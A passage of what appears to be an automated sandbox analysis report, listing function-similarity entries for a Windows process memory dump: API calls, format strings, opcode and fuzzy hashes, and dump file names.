Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$DiskFreeSpace
• String ID: %5lu
• API String ID: 2448137811-2100233843
• Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
• Instruction ID: b9b74c772823cee29df94f2d028efbccfadf6d1e675347f7460600c5c318d307
• Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
• Instruction Fuzzy Hash: CF41A322709AC985EB60EF21E8446EAB771FB84B89F908031DE4D0B748DF7CD149C710
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmp
• String ID: GeToken: (%x) '%s'
• API String ID: 2081463915-1994581435
• Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
• Instruction ID: 70fd25d74da47d12fb716eef386bc8dc117f4746264db55345f3ca8141e561f9
• Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
• Instruction Fuzzy Hash: F1719E24E0C68BC6FBA4BF65E444275AAB0BF40FAAFF40535D50D466A1DF3DA881C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr
• String ID:
• API String ID: 1497570035-0
• Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
• Instruction ID: 31cd90be6b163c8b71dfad9a14f26821a0496340057305e2d3c4dae46a683241
• Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
• Instruction Fuzzy Hash: 41C10621A1869A82EA54BF11E4442BDEFB0FF84F9AFA44135EA5E476D5DF3CE440C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
• Instruction ID: a9992facd20acd4269a3bc22e884dd69020e74a3a0ad837b9447a31a30c05661
• Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
• Instruction Fuzzy Hash: 87A10661B1829A45EE14AF65945427DEAB9BF44FE6FA44230EE6E477C4EE3CE401C310
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
  • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
• _pipe.MSVCRT ref: 00007FF789BC6C1E
• _get_osfhandle.MSVCRT ref: 00007FF789BC6CD1
• DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF789BC6CFB
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heapwcschr$AllocateDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
• String ID:
• API String ID: 1037144754-0
• Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
• Instruction ID: a820dd19a9d895e1b73eca85135eb830b5a5eebf0a5c26bd0df902f96c610bc8
• Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
• Instruction Fuzzy Hash: 9E717B31A0864A86E754BF35D84043CBAB1FF85F6AFA48234EA1D572D5CF3CA442C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CurrentDebugDebuggerOutputPresentStringThread
• String ID:
• API String ID: 4268342597-0
• Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
• Instruction ID: 0e791dc2365079af5ce132903c6c48ea24b5aa05e5f1349113746e7c02b22b6f
• Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
• Instruction Fuzzy Hash: 21814C22A1878AC6EA65AF26A44027DBBB4FF45F86FA84139E94D03754DF3DF440C760
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenToken$CloseProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2991381754-0
                                                                                                                    • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                    • Instruction ID: 541eaf46e3a7c130ece1eb9846ba9569f61ebfcff4d7cf515e272f3fdb37be52
                                                                                                                    • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                    • Instruction Fuzzy Hash: 46219E32A0864687E700AF94D4486BDFB70FB85BA2FA05135DB9943684DF7CD848CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF789BEC59E), ref: 00007FF789BC5879
                                                                                                                      • Part of subcall function 00007FF789BC58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BC5903
                                                                                                                      • Part of subcall function 00007FF789BC58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BC5943
                                                                                                                      • Part of subcall function 00007FF789BC58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BC5956
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValueVersion
                                                                                                                    • String ID: %d.%d.%05d.%d
                                                                                                                    • API String ID: 2996790148-3457777122
                                                                                                                    • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                    • Instruction ID: 5becd72f77fd03d1bc5c861680e118d6a6fc8fe1962d59d2eac0df2e96194dc5
                                                                                                                    • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                    • Instruction Fuzzy Hash: 5FF0A761A0C38987D310AF16B54406AEB61FB84BD1FA08134D94907B5ACF3CD514CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ErrorFileFindFirstLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2831795651-0
                                                                                                                    • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                                    • Instruction ID: 8dc54737c1016f54aaf368cdb801567dde9cab4c8a6d4405d7da4eacd1115599
                                                                                                                    • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                                    • Instruction Fuzzy Hash: 05D1C472A1868A8AE760AF21E4582BABBB0FF44F99FA41135DE4D07794DF3CE541C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00007FF789BC7DA1
                                                                                                                      • Part of subcall function 00007FF789BD417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD41AD
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BC7EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 168394030-0
                                                                                                                    • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                                    • Instruction ID: bffe85a56a3e52f02e1374fe6c76230bbe300e87f4fbd6023e6974a0e5186215
                                                                                                                    • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                                    • Instruction Fuzzy Hash: 41A12921B0865A86FB64AF26D4542B9ABB1FF84F9AFE04135D91D47AE5DF3CE401C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationQueryToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4239771691-0
                                                                                                                    • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                    • Instruction ID: d5392e6fac1c4a0a058b588dc49e24e5beeb959fc451505c86c49bff6770aa7b
                                                                                                                    • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                    • Instruction Fuzzy Hash: 49112E72A18785CBFB109F41E4043A9FBB4FB85B96F504131DB4C02694DB7DD588CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInformation$HandleQueryVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2149833895-0
                                                                                                                    • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                    • Instruction ID: 9ffc22abf1efbc5d718afb1705005e285f44ab96e3f7163fae1170b1ba7d4606
                                                                                                                    • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                    • Instruction Fuzzy Hash: A1114C3260868686E7609F60F4457AAFBA0FB88B86F945531DA9D42A54DBBCD448CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • towupper.MSVCRT ref: 00007FF789BC85D4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocProcessiswspacetowupper
• String ID:
• API String ID: 3520273530-0
• Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
• Instruction ID: 6a55d5f1bbd22b77a62996d2524275cea64677c54bc1492969554b13a453c86e
• Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
• Instruction Fuzzy Hash: 0361A222A0C21A86E764BF24E51437DBEB0FF45F6AFA04136DA1E562D5DE3CE480D321
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: InformationQueryToken
• String ID:
• API String ID: 4239771691-0
• Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
• Instruction ID: 29d86dd88ad764e5e292263a81e45639130e8f2460f63046edfe1ee1e11cb781
• Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
• Instruction Fuzzy Hash: 0DF030B7704B81CBD7009F64E58849CBB78F744B857A5853ACB6803704DB75D9A4CB50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BD93BB
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
• Instruction ID: 4966ab45ee22eba1397c0201d902f8098cba3b8af49ef3e9197d7a993f05825b
• Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
• Instruction Fuzzy Hash: F2B01210F26406D1D604BF31DC8506056B07F9CF22FE00431C00EC4160EF2C91DBC710
Uniqueness
• Uniqueness Score: -1.00%

APIs
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF789BCF52A,00000000,00000000,?,00000000,?,00007FF789BCE626,?,?,00000000,00007FF789BD1F69), ref: 00007FF789BCF8DE
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCF8FB
